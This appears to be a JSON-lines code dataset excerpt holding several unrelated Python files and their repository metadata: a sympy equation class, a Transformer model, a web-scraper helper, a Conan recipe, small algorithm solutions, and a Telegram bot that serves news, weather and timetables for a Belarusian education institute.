math::\n\n h_0^{\\rm sd} = \\frac{\\sqrt{10} \\sqrt{G}}{2 c^{3/2}}\\frac{I_{zz}^{1/2} \\ddot{f}_{\\rm rot}^{1/4}}{d \\left(n f_{\\rm rot}\\right)^{1/4}}\n \"\"\"\n\n if not isinstance(other, EquationBase):\n raise TypeError(\"Other equation is not the right type\")\n\n try:\n rhs = self.sympy.rhs\n neweq = rhs.subs([(other.sympy.lhs, other.sympy.rhs)])\n except Exception as e:\n raise RuntimeError(f\"Could not perform substitution: {e}\")\n\n newkwargs = deepcopy(self.kwargs)\n newfiducial = newkwargs.pop(\"default_fiducial_values\")\n newfiducial.pop(other.variable)\n newfiducial.update(other.default_fiducial_values)\n\n newkwargs[\"default_fiducial_values\"] = newfiducial\n\n newkwargs[\"rhs_latex_strings\"].pop(other.variable)\n newkwargs[\"rhs_latex_strings\"].update(other.rhs_latex_strings)\n\n newkwargs[\"parts\"] = self.generate_parts(expand_power_base(neweq, force=True))\n\n # pass on any converter functions\n if \"converters\" not in newkwargs:\n newkwargs[\"converters\"] = other.converters\n else:\n newkwargs[\"converters\"].update(other.converters)\n\n return EquationBase(**newkwargs)\n\n @property\n def sympy_const(self):\n \"\"\"\n Construct and return a :class:`sympy.core.mul.Mul` containing the\n constants in the equation.\n \"\"\"\n\n if not hasattr(self, \"_sympy_const\"):\n self._sympy_const = 1\n sympy_const_unit_values = {}\n\n for arg in self.sympy.rhs.args:\n if arg.is_constant():\n if (\n arg.is_negative\n and ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n ):\n arg *= -1 # flip sign\n\n self._sympy_const *= arg\n else:\n if isinstance(arg, Symbol):\n name = arg.name\n elif isinstance(arg, Pow):\n name = str(arg.base)\n else:\n name = None\n\n if name in CONSTANTS:\n sympy_const_unit_values[name] = CONSTANTS[name]\n\n if ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\":\n # make sure values are positive\n if isinstance(arg, Pow):\n if _coeff_isneg(arg.args[0]):\n arg = (-1 * arg.args[0]) ** arg.args[1]\n else:\n if _coeff_isneg(arg):\n arg = -1 * arg\n\n self._sympy_const *= arg\n\n # evaluate constant by creating a lamdified function\n if self._sympy_const != 1:\n # make sure constant isn't imaginary\n if any([arg == I for arg in self._sympy_const.args]):\n self._sympy_const = self._sympy_const.replace(I, 1)\n\n constf = lambdify(\n [symbols(name) for name in sympy_const_unit_values.keys()],\n self._sympy_const,\n modules=[\"numpy\"],\n )\n constant = constf(**sympy_const_unit_values)\n\n if isinstance(constant, Quantity):\n self._constant = constant.si.decompose()\n else:\n self._constant = constant\n else:\n self._constant = self._sympy_const\n\n return self._sympy_const\n\n @property\n def constant(self):\n \"\"\"\n Return the constant coefficient factor in the equation in SI units\n (if it has dimensions).\n \"\"\"\n\n if not hasattr(self, \"_constant\"):\n _ = self.sympy_const\n\n return self._constant\n\n @property\n def sympy_var(self):\n \"\"\"\n Construct and return a :class:`sympy.core.mul.Mul` containing the\n variables in the equation.\n \"\"\"\n\n if not hasattr(self, \"_sympy_var\"):\n self._sympy_var = 1\n self._sympy_var_parts = {}\n self._sympy_var_lambda = {}\n\n # get variable names\n self._var_names = self._gather_var_argnames(self.sympy.rhs)\n self._gather_var_parts(self.sympy.rhs.args)\n\n return self._sympy_var\n\n @staticmethod\n def _gather_var_argnames(eqn):\n \"\"\"\n Find the variable names in an equation.\n \"\"\"\n\n argnames = [arg.name for arg in eqn.atoms() if isinstance(arg, Symbol)]\n for arg in list(argnames):\n if 
arg in CONSTANTS:\n argnames.remove(arg)\n\n return argnames\n\n def _gather_var_parts(self, args):\n \"\"\"\n Recursively get all the separate parts of the equation\n \"\"\"\n\n for arg in args:\n if not arg.is_constant():\n if isinstance(arg, Symbol):\n name = arg.name\n elif isinstance(arg, (Abs, Add, Pow)):\n name = self._gather_var_argnames(arg)\n if len(name) > 1:\n # recursively gather parts\n if isinstance(arg, Abs):\n abseqn = expand_power_base(arg.args[0], force=True).args\n else:\n abseqn = expand_power_base(arg, force=True).args\n\n self._gather_var_parts(abseqn)\n continue\n elif len(name) == 1:\n name = name[0]\n else:\n name = str(arg.base)\n else:\n raise TypeError(\"Value must be a Symbol, Pow, Add or Abs\")\n\n if name not in CONSTANTS:\n # set variables to abs if required\n if (\n ALLOWED_VARIABLES[name][\"sign\"] is None\n and ALLOWED_VARIABLES[self.variable][\"sign\"] == \">= 0\"\n ):\n if isinstance(arg, Pow):\n arg = Abs(arg.args[0]) ** arg.args[1]\n else:\n arg = Abs(arg)\n\n self._sympy_var *= arg\n\n # store each part\n self._sympy_var_parts[name] = arg\n\n # create functions for each part of the equation\n self._sympy_var_lambda[name] = lambdify(\n [symbols(name)], arg, modules=[\"numpy\"]\n )\n\n @property\n def var_names(self):\n \"\"\"\n Get variable names from Sympy representation.\n \"\"\"\n\n if not hasattr(self, \"_var_names\"):\n _ = self.sympy_var\n\n return self._var_names\n\n @property\n def sympy_var_func(self):\n if not hasattr(self, \"_sympy_var_func\"):\n _ = self.sympy_var\n\n return self._sympy_var_func\n\n @property\n def sympy(self):\n \"\"\"\n Construct and return the equation as a\n :class:`sympy.core.relational.Equality`.\n \"\"\"\n\n if not hasattr(self, \"_sympy\"):\n eqstr = \" * \".join([f\"({c[0]})**({c[1]})\" for c in self.parts])\n sympeq = sympify(eqstr)\n self._sympy = Eq(symbols(self.variable), sympeq)\n\n return self._sympy\n\n @staticmethod\n def generate_parts(eqn, pow=1):\n \"\"\"\n Generate a list of \"parts\" from a Sympy equation.\n \"\"\"\n\n parts = []\n\n for arg in eqn.args:\n if isinstance(arg, (Abs, Mul)):\n parts.extend(EquationBase.generate_parts(arg, pow=pow))\n elif isinstance(arg, Pow):\n if isinstance(arg.base, (Abs, Mul, Pow)):\n exp = pow * arg.exp\n parts.extend(EquationBase.generate_parts(arg.base, pow=exp))\n else:\n parts.append((str(arg.base), str(arg.exp)))\n elif isinstance(arg, (Symbol, Add)):\n if pow != 1 and len(eqn.args) == 2:\n # it's got to this part from a Pow object\n if hasattr(arg, \"name\"):\n parts.append((arg.name, str(pow * eqn.args[-1])))\n else:\n parts.append((str(arg), str(pow * eqn.args[-1])))\n break\n else:\n parts.append((arg.name, str(pow)))\n elif str(arg) != \"1\":\n parts.append((str(arg), \"1\"))\n\n return parts\n\n @staticmethod\n def _frequency_converter(starteqn, end):\n \"\"\"\n Given an equation, and a required parameter, step through a set of\n frequency conversions until the equation is parameterised with the\n required variables.\n\n Parameters\n ----------\n starteqn: EquationBase\n The original equation\n end: str\n The variable name for the parameter that you want to equation to\n contain after the conversions are performed.\n\n Returns\n -------\n neweqn: EquationBase\n A new :class:`~cweqgen.equations.EquationBase` equation using the\n requested variable to parameterise it.\n \"\"\"\n\n neweqn = None\n\n # the conversion for frequency equations to loop through\n chain = [\n (\"rotationperiod\", equations(\"rotationperiod_to_angularrotationfrequency\")),\n (\n 
\"angularrotationfrequency\",\n equations(\"angularrotationfrequency_to_angulargwfrequency\"),\n ),\n (\"angulargwfrequency\", equations(\"angulargwfrequency_to_gwfrequency\")),\n (\"gwfrequency\", equations(\"gwfrequency_to_rotationfrequency\")),\n (\"rotationfrequency\", equations(\"rotationfrequency_to_period\")),\n ]\n\n # the conversion for frequency derivative equations to loop through\n chaindot = [\n (\n \"rotationperiod\",\n \"rotationpdot\",\n [equations(\"rotationpdot_to_angularrotationfdot\"), chain[0][1]],\n ),\n (\n \"angularrotationfrequency\",\n \"angularrotationfdot\",\n [equations(\"angularrotationfdot_to_angulargwfdot\"), chain[1][1]],\n ),\n (\n \"angulargwfrequency\",\n \"angulargwfdot\",\n [equations(\"angulargwfdot_to_gwfdot\"), chain[2][1]],\n ),\n (\n \"gwfrequency\",\n \"gwfdot\",\n [equations(\"gwfdot_to_rotationfdot\"), chain[3][1]],\n ),\n (\n \"rotationfrequency\",\n \"rotationfdot\",\n [equations(\"rotationfdot_to_period\"), chain[4][1]],\n ),\n ]\n\n # find the index of the end point\n endidx = ([link[0] for link in chain]).index(end)\n\n # find the starting conversion equation\n for i in range(len(chain)):\n if chain[i][0] in starteqn.var_names:\n break\n\n while True:\n # loop over conversions until finished\n if neweqn is None:\n neweqn = starteqn.substitute(chain[i][1])\n else:\n neweqn = neweqn.substitute(chain[i][1])\n\n # loop to same point as frequency parameter\n endidxdot = (i + 1) % len(chain)\n\n # find the starting conversion equation\n for j in range(len(chaindot)):\n if chaindot[j][1] in starteqn.var_names:\n break\n\n while True:\n # loop over conversions until finished\n for eqn in chaindot[j][2]:\n if neweqn is None and eqn.variable in starteqn.var_names:\n neweqn = starteqn.substitute(eqn)\n elif eqn.variable in neweqn.var_names:\n neweqn = neweqn.substitute(eqn)\n\n j = (j + 1) % len(chaindot)\n if j == endidxdot:\n break\n\n i = (i + 1) % len(chain)\n if i == endidx:\n break\n\n return neweqn\n\n def to(self, newvariable):\n \"\"\"\n Return a new version of the equation in terms of a new variable.\n Currently this is designed to convert between frequency-like and\n frequency first derivative parameters (it does not do higher frequency\n derivatives), e.g., converting an equation from using frequency and\n frequency derivative, to one using period and period derivative.\n\n Parameters\n ----------\n newvariable: str\n The new parameterisation of the equation. This can be one of:\n \"rotationfrequency\", \"rotationperiod\", \"gwfrequency\",\n \"angularrotationfrequency\", or \"angulargwfrequency\" (or any of the\n allowed aliases for these in\n :obj:`~cwinpy.definition.ALLOWED_VARIABLES`). If the equation\n contains equivalents of the variable and/or their first frequency\n derivative then both will be converted.\n\n Returns\n -------\n neweqn: EquationBase\n The equation in the new parameterisation.\n \"\"\"\n\n # find the variable name\n for var in ALLOWED_VARIABLES:\n if newvariable in ALLOWED_VARIABLES[var][\"aliases\"]:\n break\n else:\n raise ValueError(f\"{newvariable} is not a recognised variable name.\")\n\n if var not in [\n \"rotationfrequency\",\n \"rotationperiod\",\n \"gwfrequency\",\n \"angularrotationfrequency\",\n \"angulargwfrequency\",\n ]:\n raise ValueError(f\"No conversion is currently available for {var}\")\n\n return self._frequency_converter(self, var)\n\n\nclass EquationLaTeXString:\n def __init__(self, latexstring, comment=None):\n \"\"\"\n Class to hold a LaTeX equation string. 
It has a _repr_latex_ method to\n        hook into the Jupyter notebook rich display system\n        https://ipython.readthedocs.io/en/stable/config/integrating.html#rich-display\n        and show the resulting string as a LaTeX equation.\n\n        Parameters\n        ----------\n        latexstring: str\n            The LaTeX string defining the equation.\n        comment: str\n            A LaTeX comment (% will be prepended to any lines)\n        \"\"\"\n\n        self.text = str(latexstring)\n        self.comment = comment\n\n    def __repr__(self):\n        if self.comment is None:\n            return self.text\n        else:\n            output = \"\".join(f\"% {line}\\n\" for line in self.comment.split(\"\\n\"))\n            output += self.text\n            return output\n\n    def __str__(self):\n        if self.comment is None:\n            return self.text\n        else:\n            output = \"\".join(f\"% {line}\\n\" for line in self.comment.split(\"\\n\"))\n            output += self.text\n            return output\n\n    def _repr_latex_(self):\n        return \"$\" + self.text + \"$\"\n\n\nclass EquationLaTeXToImage:\n    def __init__(self, latexstring, dpi=200):\n        \"\"\"\n        Class to hold a LaTeX equation string and convert it to an image for\n        display in a Jupyter notebook.\n\n        Parameters\n        ----------\n        latexstring: str\n            The LaTeX string defining the equation.\n        dpi: int\n            The resolution (dots per inch) of the output plot.\n        \"\"\"\n\n        self.text = str(latexstring)\n\n        self.dpi = dpi\n        self.fig, self.ax = plt.subplots(1)\n\n        try:\n            t = self.ax.text(0.05, 0.5, self.text, usetex=True)\n        except RuntimeError:\n            t = self.ax.text(0.0, 0.5, self.text)\n        self.ax.axis(\"off\")\n\n        # crop figure to tight around the text\n        bb = t.get_window_extent(renderer=self.fig.canvas.get_renderer())\n        transf = self.ax.transData.inverted()\n        bb_datacoords = bb.transformed(transf)\n\n        rect = bb_datacoords.get_points().flatten()\n        rect[3] += 0.1 * rect[3]  # add 10% on to upper value for some reason!\n\n        tight_params = {\"rect\": rect}\n\n        self.fig.set_dpi(self.dpi)\n        self.fig.set_tight_layout(tight_params)\n\n    def savefig(self, *arg, **kwargs):\n        kwargs.setdefault(\"dpi\", self.dpi)\n        return self.fig.savefig(*arg, **kwargs)\n","repo_name":"cwinpy/cweqgen","sub_path":"cweqgen/equations.py","file_name":"equations.py","file_ext":"py","file_size_in_byte":43924,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"14103115145","text":"# 1. The shape of the tensor passed across all modules is kept as (batch, d, seq_len)\n# 2. 
Each module's (except for attention) output is normalized, so no need to normalize input\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom Encoder import TransformerEncoder\nfrom Decoder import TransformerDecoder\nfrom OutputBlock import TransformerOutput\n\n# class Object(object):\n# pass\n# self = Object()\n\n# self = model\nclass Transformer(nn.Module):\n def __init__(self, model_settings, output_structure = \"Vanilla\"):\n super().__init__()\n torch.manual_seed(321)\n self.model_settings, self.output_structure = model_settings, output_structure\n self.encoder = TransformerEncoder(model_settings)\n self.decoder = TransformerDecoder(model_settings)\n self.linear = nn.Linear(model_settings[\"num_hiddens\"], len(model_settings[\"check_loss\"]) + 1)\n self.sigmoid = nn.Sigmoid()\n \n self.alpha_org, self.beta_org = model_settings[\"max_X\"] - model_settings[\"min_X\"], model_settings[\"min_X\"]\n if output_structure != \"Vanilla\":\n model_settings2 = model_settings.copy()\n model_settings2[\"num_hiddens\"] = model_settings[\"f_in\"][0]\n model_settings2[\"num_q\"] = model_settings2[\"num_k\"] = model_settings2[\"num_v\"] = model_settings[\"num_q_SAND\"]\n model_settings2[\"dropout\"] = model_settings[\"dropout_SAND\"]\n model_settings2[\"check_loss\"] = ()\n self.outblock = TransformerOutput(model_settings2, output_structure)\n \n def forward(self, x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m, iteration = 0, TAs_position = None, isTraining = True):\n # x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m = e_X, d_T, e_m_mh, e_m_mh, d_m_mh, d_m\n # x, y_t, emb_m_mh, e_m_mh, d_m_mh, d_m = x, d_T_full, emb_m_mh, emb_m_mh, None, None\n min_X, max_X, denoise_method = self.model_settings[\"min_X\"], self.model_settings[\"max_X\"], self.model_settings[\"denoise_method\"]\n e_output = self.encoder(x, e_m_mh, emb_m_mh)\n d_output = self.decoder(y_t, e_output, e_m_mh, d_m_mh)\n org = self.linear(d_output)\n \n if self.output_structure == \"Vanilla\":\n return self.sigmoid(org) * self.alpha_org + self.beta_org\n else:\n # iteration = 0; TAs_position = None; isTraining = True\n org_detach = org.detach().clone()[:, :, 0].unsqueeze(-1)\n smooth = self.outblock(org_detach, y_t, d_m, iteration, TAs_position, isTraining)\n return [smooth, self.sigmoid(org) * self.alpha_org + self.beta_org]\n\n\n","repo_name":"eric40065/SAND","sub_path":"py_code/TransformerModel.py","file_name":"TransformerModel.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23830391866","text":"\"\"\"\nWrite a function named uses_all that takes a word and a string of required letters,\nand that returns True if the word uses all the required letters at least once.\n\"\"\"\n\ndef used_all():\n word = input(\"Enter the word:\")\n letters = input(\"Enter the string of letters:\")\n count = 0\n\n l = len(letters)\n for alphabet in word:\n if alphabet in letters:\n count=count+1\n if count>=l:\n return True\n else:\n return False\n\nprint(used_all())\n","repo_name":"PandaWhoCodes/ThinkPython","sub_path":"used_all.py","file_name":"used_all.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4941314081","text":"import pickle\nimport json\nfrom email.mime.text import MIMEText\n\nclass Data:\n\turls = []\n\tpickle = {\"save\": False, \"path\": \"\"}\n\tscrape_order = []\n\tcols = []\n\tpages = []\n\temail = {\"send\": False, \"path\": \"\", 
\"address\": \"\", \"subject\": \"\", \"body\": \"\"}\n\n\t@classmethod\n\tdef load_topic(cls, topic_path):\n\t\twith open(topic_path, \"r\", encoding=\"utf-8\") as f:\n\t\t\tparams = json.load(f)\n\t\t\tprint(\"--\", params['header'], \"----\")\n\t\t\tcls.pickle = params['pickle']\n\t\t\tcls.email = params['email']\n\t\t\tdef eval_email(email_path):\n\t\t\t\twith open(email_path, \"r\", encoding=\"utf8\") as email_file:\n\t\t\t\t\tbody = email_file.read()\n\t\t\t\t\treturn MIMEText(body, \"html\")\n\t\t\tcls.email['body'] = eval_email(params['email']['path'])\n\t\t\tcls.pages = params['pages']\n\t\t\tdef eval_pages(pages):\n\t\t\t\timport sites, filters\n\t\t\t\tfor i, _ in enumerate(pages):\n\t\t\t\t\tpages[i][\"site\"] = eval(f\"sites.{pages[i]['site']}\")\n\t\t\t\t\tpages[i][\"filter\"] = eval(f\"filters.{pages[i]['filter']}\")\n\t\t\t\treturn pages\n\t\t\tcls.pages = eval_pages(params['pages'])\n\t\t\tcls.cols = params['cols']\n\n\t@classmethod\n\tdef get_urls_from_pickle(cls):\n\t\ttry:\n\t\t\twith open(cls.pickle['path'], 'rb') as f:\n\t\t\t\turls = pickle.load(f)\n\t\texcept (EOFError, FileNotFoundError):\n\t\t\t\turls = []\n\t\treturn urls\n\n\t@classmethod\n\tdef get_urls(cls):\n\t\tif Data.urls == []:\n\t\t\tData.urls = Data.get_urls_from_pickle()\n\t\treturn Data.urls\n\n\t@classmethod\n\tdef already_seen(cls, url):\n\t\treturn url in Data.get_urls()\n\n\t@classmethod\n\tdef save_url(cls, url):\n\t\tData.urls.append(url)\n\n\t@classmethod\n\tdef save_to_pickle(cls):\n\t\tif (not cls.pickle['path']):\n\t\t\treturn\n\t\twith open(cls.pickle['path'], 'wb') as pickle_file:\n\t\t\tpickle.dump(Data.get_urls(), pickle_file)\t\t\n\t\t","repo_name":"francoismartineau/scraper","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31966813455","text":"from conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass TgbotConan(ConanFile):\n name = \"tgbot\"\n\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"http://reo7sp.github.io/tgbot-cpp\"\n description = \"C++ library for Telegram bot API\"\n topics = (\"tgbot\", \"telegram\", \"telegram-api\", \"telegram-bot\", \"bot\")\n license = \"MIT\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n generators = \"cmake\", \"cmake_find_package\"\n exports_sources = [\"CMakeLists.txt\"]\n\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n self.requires(\"boost/1.79.0\")\n self.requires(\"libcurl/7.84.0\")\n self.requires(\"openssl/1.1.1q\")\n\n @property\n def _required_boost_components(self):\n return [\"system\"]\n\n def validate(self):\n if self.settings.compiler.cppstd:\n tools.check_min_cppstd(self, 11)\n miss_boost_required_comp = any(getattr(self.options[\"boost\"], \"without_{}\".format(boost_comp), True) for boost_comp in self._required_boost_components)\n if self.options[\"boost\"].header_only or miss_boost_required_comp:\n raise ConanInvalidConfiguration(\"{0} requires non header-only boost 
with these components: {1}\".format(self.name, \", \".join(self._required_boost_components)))\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version],\n destination=self._source_subfolder, strip_root=True)\n\n def _patch_sources(self):\n # Don't force PIC\n tools.replace_in_file(\n os.path.join(self._source_subfolder, \"CMakeLists.txt\"),\n \"set_property(TARGET ${PROJECT_NAME} PROPERTY POSITION_INDEPENDENT_CODE ON)\",\n \"\"\n )\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"ENABLE_TESTS\"] = False\n self._cmake.configure()\n return self._cmake\n\n def build(self):\n self._patch_sources()\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n def package_info(self):\n self.cpp_info.libs = [\"TgBot\"]\n self.cpp_info.requires = [\"boost::headers\", \"boost::system\", \"libcurl::libcurl\", \"openssl::openssl\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/tgbot/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"71213212408","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nN = int(input()) # 개수 입력\nl = list() # 저장할 리스트\n\nfor i in range(N): # 배열 안에 입력\n l.append(int(input()))\n \nl.sort()\n\nfor i in l:\n print(i)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"knamk7/algorithm_study","sub_path":"Week1(Sorting)/Day1/2750.py","file_name":"2750.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72478664248","text":"# -*- coding: utf-8 -*-\n# UTF-8 encoding when using korean\nn = input()\nstart = [\"00\", \"00\"]\nend = [\"23\", \"59\"]\nfor _ in range(int(n)):\n\tstartTemp, endTemp = input().split(\" ~ \")\n\tstartHour, startMin = startTemp.split(\":\")\n\tendHour, endMin = endTemp.split(\":\")\n\tif int(startHour) > int(start[0]):\n\t\tstart[0] = startHour\n\t\tstart[1] = startMin\n\telif int(startHour) == int(start[0]) and int(startMin) > int(start[1]):\n\t\tstart[1] = startMin\n\tif int(endHour) < int(end[0]):\n\t\tend[0] = endHour\n\t\tend[1] = endMin\n\telif int(endHour) == int(end[0]) and int(endMin) < int(end[1]):\n\t\tend[1] = endMin\nif start[0] > end[0] or (start[0] == end[0] and start[1] >= end[1]):\n\tprint(\"-1\")\nelse:\n\tprint(f\"{':'.join(start)} ~ {':'.join(end)}\")","repo_name":"eehwan/Algorithm-solutions","sub_path":"scofe2021/1차/대여 시간을 추천���드립니다.py","file_name":"대여 시간을 추천해드립니다.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14116858423","text":"class disjoint_set:\n def __init__(self, n):\n self.rank = [0] * n\n self.size = [1] * n\n self.max = 1\n self.parent = [i for i in range(n)]\n \n def find(self, x):\n if x != self.parent[x]:\n self.parent[x] = self.find(self.parent[x])\n return self.parent[x]\n \n def union(self, x, y):\n x, y = self.find(x), self.find(y)\n if x == y:\n return\n if self.rank[x] > self.rank[y]:\n self.parent[y] = x\n self.size[x] += self.size[y]\n else:\n self.parent[x] = y\n self.size[y] += self.size[x]\n if self.rank[x] == self.rank[y]:\n self.rank[y] += 1\n self.max = max(self.max, self.size[x], self.size[y])\n \n def 
group(self):\n s = set()\n for x in self.parent:\n s.add(self.find(x))\n return len(s)\n \n def get_max(self):\n return self.max\n\nclass Solution:\n def removeStones(self, stones: List[List[int]]) -> int:\n n = len(stones)\n ds = disjoint_set(n)\n\n row = [[] for _ in range(10000)]\n col = [[] for _ in range(10000)]\n for i, s in enumerate(stones):\n row[s[0]].append(i)\n col[s[1]].append(i)\n \n for r in row:\n for i in range(1, len(r)):\n ds.union(r[i], r[i-1])\n \n for c in col:\n for i in range(1, len(c)):\n ds.union(c[i], c[i-1])\n \n return n-ds.group()\n ","repo_name":"siyile/leetcode","sub_path":"src/Problem947.py","file_name":"Problem947.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10658279738","text":"import asyncio\nimport json\n\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom aiogram.utils.markdown import hbold, hlink\nfrom aiogram.dispatcher.filters import Text\n\nfrom config import token, channel_id, admin_id\nfrom news import check_news_update\nfrom weather import get_weather, EmptyWeather\nfrom timetable import get_timetable, show_list_timetable\nfrom announcement import check_ann_update, get_announcements\n\nbot = Bot(token=token, parse_mode=types.ParseMode.HTML)\ndp = Dispatcher(bot)\nusers_dict = {}\n\n\n@dp.message_handler(commands=\"start\")\nasync def start(message: types.Message):\n start_buttons = ['Анонсы мероприятий',\n 'Последние 5 новостей',\n 'Расписание занятий',\n 'Погода в Гродно',\n ]\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard.add(*start_buttons)\n\n global user_id\n user_id = message.from_user.id\n name = message.from_user.first_name\n last_name = message.from_user.last_name\n date = message.date.ctime()\n # def user_photo(message):\n # photo = bot.get_user_profile_photos(message.from_user.id)\n # bot.send_photo(message.chat.id, photo.photos[0][2].file_id)\n\n # users_dict[user_id] = {\n # 'name': name,\n # 'last_name': last_name,\n # 'date': date,\n # }\n\n with open('users.txt', 'a') as f:\n f.write(f' {date} {user_id} {name} {last_name}\\n')\n\n await message.answer(\n f'Добрый день, {message.from_user.first_name}!\\n👩🏻‍🏫 Добро пожаловать в чат-бот Гродненского областного института развития образования!‍🎓‍🏫‍ \\n'\n f'👏Рады Вас приветствовать!👏\\n'\n f'Больше информации Вы можете получить на нашем сайте {hlink(\"groiro.by\", \"https://groiro.by/\")}.\\n'\n f'Выберите один из пунктов меню ниже👇', reply_markup=keyboard, disable_web_page_preview=True)\n\n\n@dp.message_handler(Text(equals='Последние 5 новостей'))\nasync def get_last_five_news(message: types.Message):\n with open('news_dict.json') as f:\n news_dict = json.load(f)\n\n for k, v in sorted(news_dict.items())[-5:]:\n image = types.input_file.InputFile.from_url(v['article_img'])\n news = f\"🔥{hbold(v['article_title'])}🔥\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['article_url'])}🎓\"\n await message.answer_photo(image, news)\n\n\n@dp.message_handler(Text(equals='Анонсы мероприятий'))\nasync def get_announcement(message: types.Message):\n ann_dict = get_announcements()\n\n for k, v in sorted(ann_dict.items()):\n ann = f\"{hbold(v['ann_title'])}\\n\\n\" \\\n f\"{hbold('Дата: ' + v['ann_date'])}\\n\\n\" \\\n f\"Подробнее 👉{hlink('ЗДЕСЬ', v['ann_url'])}🎓\"\n # print(ann)\n await message.answer(ann, disable_web_page_preview=True)\n\n\n# @dp.message_handler(Text(equals='Сообщить об ошибке'))\n# async def get_error_message(message: types.Message):\n# 
await message.answer('Введите Ваше сообщение и нажмите \"Отправить\"')\n#\n# @dp.callback_query_handler(lambda call: True)\n# async def get_message_from_user(callback_query: types.CallbackQuery):\n# await bot.send_message(admin_id,\n# f'Пользователь {message.from_user.first_name + \" \" + message.from_user.last_name}'\n# f'(id: {message.from_user.id}) написал Вам сообщение.\\n\\n'\n# f'{callback_query.data}')\n# await message.answer('Спасибо, Ваше сообщение отправлено администратору.')\n\n\n\n@dp.message_handler(Text(equals=\"Погода в Гродно\"))\nasync def get_weather_in_Grodno(message: types.Message):\n weather = get_weather()\n if isinstance(weather, EmptyWeather):\n await message.answer(\n f'Возникла ошибка при получении погоды.\\nВероятно мы уже знаем об этом.\\nПожалуйста, попробуйте позже.')\n # raise weather\n # print(weather)\n else:\n await message.answer(f'🌎 {hbold(\"Погода в Гродно сейчас.\")} 🌈\\n\\n'\n f'{hbold(\"Актуально на\")} {weather.at_time.strftime(\"%d.%m %H:%M\")}\\n\\n'\n f'{weather.describe}\\n'\n f'{hbold(\"Температура:\")} {round(weather.temperature)}°С\\n'\n f'{hbold(\"Влажность:\")} {weather.himidity}%\\n'\n f'{hbold(\"Давление:\")} {weather.pressure} мм.рт.ст\\n'\n f'{hbold(\"Ветер:\")} {weather.wind_speed} м/с\\n'\n f'{hbold(\"Рассвет:\")} {weather.sunrise.strftime(\"%d.%m %H:%M\")}\\n'\n f'{hbold(\"Закат:\")} {weather.sunset.strftime(\"%d.%m %H:%M\")}\\n\\n'\n f'{hbold(\"🤩 Хорошего дня 🤩\")}')\n\n\n@dp.message_handler(Text(equals=\"Расписание занятий\"))\nasync def choose_timetable(message: types.Message):\n dict_ttables = show_list_timetable()\n markup = types.InlineKeyboardMarkup()\n markup.row_width = 1\n for k, v in dict_ttables.items():\n markup.add(types.InlineKeyboardButton(f'{k} {v}', callback_data=k))\n await bot.send_message(message.from_user.id, 'Выберите Ваше ПК:', reply_markup=markup)\n\n @dp.callback_query_handler(lambda call: True)\n async def send_timetable(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n if callback_query.data in dict_ttables:\n tt = get_timetable(callback_query.data)\n await message.answer(f\"{hbold('Ваше ПК:')} {tt[0]}.\\n\\n\")\n await message.answer_document(open(tt[1], \"rb\"),\n caption='Ваше расписание ☝. 
